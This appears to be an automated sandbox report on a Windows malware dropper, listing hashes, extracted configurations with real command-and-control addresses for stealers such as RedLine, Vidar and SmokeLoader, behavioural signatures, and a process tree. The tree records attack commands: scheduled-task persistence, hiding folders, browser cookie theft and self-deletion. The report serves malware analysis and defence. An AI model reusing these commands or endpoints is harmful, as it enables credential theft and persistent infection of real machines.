Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    99s
  • max time network
    1814s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    28-07-2021 23:45

General

  • Target

    8 (23).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

1k_TEST

C2

86.106.181.209:18845

Extracted

Family

redline

Botnet

NEW_5k

C2

86.106.181.209:18845

Extracted

Family

redline

C2

45.140.147.111:22333

Extracted

Family

redline

Botnet

WW

C2

193.56.146.60:51431

Extracted

Family

vidar

Version

39.8

Botnet

865

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    865

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • suricata: ET MALWARE Win32/Kelihos.F exe Download 2
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 12 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 53 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 16 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 18 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • autoit_exe 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 5 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 9 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 9 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 9 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 11 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 20 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 13 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:296
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2684
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2676
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2560
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2388
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
                PID:2332
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1896
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                  1⤵
                    PID:1456
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1268
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                      1⤵
                        PID:1260
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                        1⤵
                          PID:1076
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                          1⤵
                          • Drops file in System32 directory
                          PID:964
                          • C:\ProgramData\Provisioning\settings.exe
                            C:\ProgramData\Provisioning\settings.exe
                            2⤵
                              PID:4300
                              • C:\Windows\system32\schtasks.exe
                                schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                3⤵
                                • Creates scheduled task(s)
                                PID:1472
                            • C:\Users\Admin\AppData\Local\0759bb8d-9ec9-4950-b913-fd70653aea63\43FA.exe
                              C:\Users\Admin\AppData\Local\0759bb8d-9ec9-4950-b913-fd70653aea63\43FA.exe --Task
                              2⤵
                                PID:5628
                                • C:\Users\Admin\AppData\Local\0759bb8d-9ec9-4950-b913-fd70653aea63\43FA.exe
                                  C:\Users\Admin\AppData\Local\0759bb8d-9ec9-4950-b913-fd70653aea63\43FA.exe --Task
                                  3⤵
                                    PID:5080
                                • C:\Users\Admin\AppData\Roaming\ihceatb
                                  C:\Users\Admin\AppData\Roaming\ihceatb
                                  2⤵
                                    PID:2808
                                    • C:\Users\Admin\AppData\Roaming\ihceatb
                                      C:\Users\Admin\AppData\Roaming\ihceatb
                                      3⤵
                                        PID:3784
                                    • C:\Users\Admin\AppData\Roaming\sgceatb
                                      C:\Users\Admin\AppData\Roaming\sgceatb
                                      2⤵
                                        PID:4572
                                      • C:\Users\Admin\AppData\Roaming\ejceatb
                                        C:\Users\Admin\AppData\Roaming\ejceatb
                                        2⤵
                                          PID:4168
                                        • C:\ProgramData\Provisioning\settings.exe
                                          C:\ProgramData\Provisioning\settings.exe
                                          2⤵
                                            PID:1140
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                              3⤵
                                              • Creates scheduled task(s)
                                              PID:3588
                                          • C:\ProgramData\Provisioning\settings.exe
                                            C:\ProgramData\Provisioning\settings.exe
                                            2⤵
                                              PID:5972
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                3⤵
                                                • Creates scheduled task(s)
                                                PID:5660
                                            • C:\Users\Admin\AppData\Local\0759bb8d-9ec9-4950-b913-fd70653aea63\43FA.exe
                                              C:\Users\Admin\AppData\Local\0759bb8d-9ec9-4950-b913-fd70653aea63\43FA.exe --Task
                                              2⤵
                                                PID:3264
                                                • C:\Users\Admin\AppData\Local\0759bb8d-9ec9-4950-b913-fd70653aea63\43FA.exe
                                                  C:\Users\Admin\AppData\Local\0759bb8d-9ec9-4950-b913-fd70653aea63\43FA.exe --Task
                                                  3⤵
                                                    PID:5820
                                                • C:\Users\Admin\AppData\Roaming\ihceatb
                                                  C:\Users\Admin\AppData\Roaming\ihceatb
                                                  2⤵
                                                    PID:5588
                                                    • C:\Users\Admin\AppData\Roaming\ihceatb
                                                      C:\Users\Admin\AppData\Roaming\ihceatb
                                                      3⤵
                                                        PID:4156
                                                    • C:\Users\Admin\AppData\Roaming\sgceatb
                                                      C:\Users\Admin\AppData\Roaming\sgceatb
                                                      2⤵
                                                        PID:3964
                                                      • C:\Users\Admin\AppData\Roaming\ejceatb
                                                        C:\Users\Admin\AppData\Roaming\ejceatb
                                                        2⤵
                                                          PID:5324
                                                        • C:\ProgramData\Provisioning\settings.exe
                                                          C:\ProgramData\Provisioning\settings.exe
                                                          2⤵
                                                            PID:4424
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                              3⤵
                                                              • Creates scheduled task(s)
                                                              PID:4528
                                                          • C:\ProgramData\Provisioning\settings.exe
                                                            C:\ProgramData\Provisioning\settings.exe
                                                            2⤵
                                                              PID:5676
                                                              • C:\Windows\system32\schtasks.exe
                                                                schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                3⤵
                                                                • Creates scheduled task(s)
                                                                PID:4852
                                                            • C:\Users\Admin\AppData\Local\0759bb8d-9ec9-4950-b913-fd70653aea63\43FA.exe
                                                              C:\Users\Admin\AppData\Local\0759bb8d-9ec9-4950-b913-fd70653aea63\43FA.exe --Task
                                                              2⤵
                                                                PID:852
                                                              • C:\Users\Admin\AppData\Roaming\ihceatb
                                                                C:\Users\Admin\AppData\Roaming\ihceatb
                                                                2⤵
                                                                  PID:4136
                                                                • C:\Users\Admin\AppData\Roaming\sgceatb
                                                                  C:\Users\Admin\AppData\Roaming\sgceatb
                                                                  2⤵
                                                                    PID:5224
                                                                  • C:\Users\Admin\AppData\Roaming\ejceatb
                                                                    C:\Users\Admin\AppData\Roaming\ejceatb
                                                                    2⤵
                                                                      PID:5068
                                                                  • C:\Users\Admin\AppData\Local\Temp\8 (23).exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\8 (23).exe"
                                                                    1⤵
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:900
                                                                    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:764
                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCF2E12C4\setup_install.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\7zSCF2E12C4\setup_install.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:3980
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                                          4⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:3544
                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCF2E12C4\sonia_1.exe
                                                                            sonia_1.exe
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:2080
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSCF2E12C4\sonia_1.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\7zSCF2E12C4\sonia_1.exe" -a
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:2840
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                          4⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:3572
                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCF2E12C4\sonia_2.exe
                                                                            sonia_2.exe
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:4040
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                                          4⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:1492
                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCF2E12C4\sonia_3.exe
                                                                            sonia_3.exe
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Modifies system certificate store
                                                                            PID:2208
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 1684
                                                                              6⤵
                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                              • Program crash
                                                                              PID:4264
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                                          4⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:3328
                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCF2E12C4\sonia_5.exe
                                                                            sonia_5.exe
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Checks computer location settings
                                                                            PID:3984
                                                                            • C:\Users\Admin\Documents\qI4mpmdVBS0tJUEtol9gFRJa.exe
                                                                              "C:\Users\Admin\Documents\qI4mpmdVBS0tJUEtol9gFRJa.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:4608
                                                                              • C:\Users\Admin\Documents\qI4mpmdVBS0tJUEtol9gFRJa.exe
                                                                                "C:\Users\Admin\Documents\qI4mpmdVBS0tJUEtol9gFRJa.exe"
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Checks SCSI registry key(s)
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                PID:4744
                                                                            • C:\Users\Admin\Documents\hYKeNSaeety_4HrDMlVeRdph.exe
                                                                              "C:\Users\Admin\Documents\hYKeNSaeety_4HrDMlVeRdph.exe"
                                                                              6⤵
                                                                                PID:4668
                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5600
                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5656
                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  7⤵
                                                                                    PID:6044
                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:6112
                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    7⤵
                                                                                      PID:4664
                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                      7⤵
                                                                                        PID:5784
                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        7⤵
                                                                                          PID:5328
                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                          7⤵
                                                                                            PID:5636
                                                                                        • C:\Users\Admin\Documents\jCXu02fljFN1KyYwmvfF2U_i.exe
                                                                                          "C:\Users\Admin\Documents\jCXu02fljFN1KyYwmvfF2U_i.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4800
                                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                                            schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                                            7⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:4540
                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                            cmd /c attrib +H +S "C:\ProgramData\\Provisioning" & attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                            7⤵
                                                                                              PID:5836
                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                attrib +H +S "C:\ProgramData\\Provisioning"
                                                                                                8⤵
                                                                                                • Views/modifies file attributes
                                                                                                PID:5416
                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                                8⤵
                                                                                                • Views/modifies file attributes
                                                                                                PID:2364
                                                                                            • C:\ProgramData\Provisioning\settings.exe
                                                                                              "C:\ProgramData\Provisioning\settings.exe"
                                                                                              7⤵
                                                                                                PID:5880
                                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                  schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                                                  8⤵
                                                                                                  • Creates scheduled task(s)
                                                                                                  PID:996
                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                  cmd /c attrib +H +S "C:\ProgramData\\Provisioning" & attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                                  8⤵
                                                                                                    PID:5872
                                                                                                    • C:\Windows\system32\attrib.exe
                                                                                                      attrib +H +S "C:\ProgramData\\Provisioning"
                                                                                                      9⤵
                                                                                                      • Views/modifies file attributes
                                                                                                      PID:5112
                                                                                                    • C:\Windows\system32\attrib.exe
                                                                                                      attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                                      9⤵
                                                                                                      • Views/modifies file attributes
                                                                                                      PID:4344
                                                                                              • C:\Users\Admin\Documents\r6xWabm_Hv13p72M5Wix8fj2.exe
                                                                                                "C:\Users\Admin\Documents\r6xWabm_Hv13p72M5Wix8fj2.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:4752
                                                                                                • C:\Users\Admin\Documents\r6xWabm_Hv13p72M5Wix8fj2.exe
                                                                                                  C:\Users\Admin\Documents\r6xWabm_Hv13p72M5Wix8fj2.exe
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:2428
                                                                                              • C:\Users\Admin\Documents\acse3DYQtaZK6FFwqBHY0SPO.exe
                                                                                                "C:\Users\Admin\Documents\acse3DYQtaZK6FFwqBHY0SPO.exe"
                                                                                                6⤵
                                                                                                  PID:4728
                                                                                                • C:\Users\Admin\Documents\QDS9YhTBF9yKCehBAgpkvLHz.exe
                                                                                                  "C:\Users\Admin\Documents\QDS9YhTBF9yKCehBAgpkvLHz.exe"
                                                                                                  6⤵
                                                                                                    PID:4712
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                                                                      7⤵
                                                                                                        PID:5168
                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                          taskkill /f /im chrome.exe
                                                                                                          8⤵
                                                                                                          • Kills process with taskkill
                                                                                                          PID:5324
                                                                                                    • C:\Users\Admin\Documents\8aCQSsPJiyNeh7NfkkaX8SwR.exe
                                                                                                      "C:\Users\Admin\Documents\8aCQSsPJiyNeh7NfkkaX8SwR.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                      PID:4928
                                                                                                      • C:\Users\Public\run.exe
                                                                                                        C:\Users\Public\run.exe
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5976
                                                                                                        • C:\Users\Public\run.exe
                                                                                                          C:\Users\Public\run.exe
                                                                                                          8⤵
                                                                                                            PID:4396
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\run.exe"
                                                                                                              9⤵
                                                                                                                PID:5824
                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                  timeout /T 10 /NOBREAK
                                                                                                                  10⤵
                                                                                                                  • Delays execution with timeout.exe
                                                                                                                  PID:4108
                                                                                                            • C:\Users\Public\run.exe
                                                                                                              C:\Users\Public\run.exe
                                                                                                              8⤵
                                                                                                                PID:5356
                                                                                                          • C:\Users\Admin\Documents\0wmj8WyhaEc35_aquGMgH8fU.exe
                                                                                                            "C:\Users\Admin\Documents\0wmj8WyhaEc35_aquGMgH8fU.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4980
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:1798690 "__IRAFN:C:\Users\Admin\Documents\0wmj8WyhaEc35_aquGMgH8fU.exe" "__IRCT:3" "__IRTSS:0" "__IRSID:S-1-5-21-1594587808-2047097707-2163810515-1000"
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:788
                                                                                                              • C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe"
                                                                                                                8⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                PID:6092
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im smartmap.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                  9⤵
                                                                                                                    PID:5172
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /im smartmap.exe /f
                                                                                                                      10⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:6044
                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                      timeout /t 6
                                                                                                                      10⤵
                                                                                                                      • Delays execution with timeout.exe
                                                                                                                      PID:4444
                                                                                                            • C:\Users\Admin\Documents\0Y6RkNvC6caAzO3sPNxtzUru.exe
                                                                                                              "C:\Users\Admin\Documents\0Y6RkNvC6caAzO3sPNxtzUru.exe"
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:5008
                                                                                                              • C:\Users\Admin\Documents\0Y6RkNvC6caAzO3sPNxtzUru.exe
                                                                                                                C:\Users\Admin\Documents\0Y6RkNvC6caAzO3sPNxtzUru.exe
                                                                                                                7⤵
                                                                                                                  PID:2468
                                                                                                                • C:\Users\Admin\Documents\0Y6RkNvC6caAzO3sPNxtzUru.exe
                                                                                                                  C:\Users\Admin\Documents\0Y6RkNvC6caAzO3sPNxtzUru.exe
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:852
                                                                                                              • C:\Users\Admin\Documents\gqu0FxyaPVIwYkwztW_Zi8ui.exe
                                                                                                                "C:\Users\Admin\Documents\gqu0FxyaPVIwYkwztW_Zi8ui.exe"
                                                                                                                6⤵
                                                                                                                  PID:5060
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\gqu0FxyaPVIwYkwztW_Zi8ui.exe"
                                                                                                                    7⤵
                                                                                                                      PID:5304
                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                        timeout /T 10 /NOBREAK
                                                                                                                        8⤵
                                                                                                                        • Delays execution with timeout.exe
                                                                                                                        PID:5164
                                                                                                                  • C:\Users\Admin\Documents\i0ObQm5NDbnDemjkqW2ftJm8.exe
                                                                                                                    "C:\Users\Admin\Documents\i0ObQm5NDbnDemjkqW2ftJm8.exe"
                                                                                                                    6⤵
                                                                                                                      PID:4960
                                                                                                                      • C:\Users\Admin\Documents\i0ObQm5NDbnDemjkqW2ftJm8.exe
                                                                                                                        C:\Users\Admin\Documents\i0ObQm5NDbnDemjkqW2ftJm8.exe
                                                                                                                        7⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Modifies registry class
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:2168
                                                                                                                      • C:\Users\Admin\Documents\i0ObQm5NDbnDemjkqW2ftJm8.exe
                                                                                                                        C:\Users\Admin\Documents\i0ObQm5NDbnDemjkqW2ftJm8.exe
                                                                                                                        7⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4788
